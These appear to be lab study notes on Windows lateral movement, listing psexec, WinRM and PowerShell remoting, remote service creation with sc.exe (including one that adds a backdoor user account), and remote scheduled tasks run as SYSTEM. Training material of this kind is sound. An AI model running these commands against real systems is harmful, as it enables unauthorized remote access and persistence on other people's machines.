Spawning Processes Remotely

Psexec

  1. psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

Remote Process Creation Using WinRM

  1. winrs.exe -u:Administrator -p:Mypass123 -r:target cmd
  1. $username = 'Administrator';
  2. $password = 'Mypass123';
  3. $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
  4. $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  1. Enter-PSSession -Computername TARGET -Credential $credential
  1. Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

Remotely Creating Services Using sc

  1. sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
  2. sc.exe \\TARGET start THMservice
  1. sc.exe \\TARGET stop THMservice
  2. sc.exe \\TARGET delete THMservice

Creating Scheduled Tasks Remotely

  1. schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 
  3. schtasks /s TARGET /run /TN "THMtask1"
  1. schtasks /S TARGET /TN "THMtask1" /DELETE /F